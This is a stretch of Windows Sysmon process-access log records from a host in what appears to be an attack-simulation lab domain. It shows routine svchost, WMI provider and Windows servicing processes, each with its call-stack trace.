12:02:28.128{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.128{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.128{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.128{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.128{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.128{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.128{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.097{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.097{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.097{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.097{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.097{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 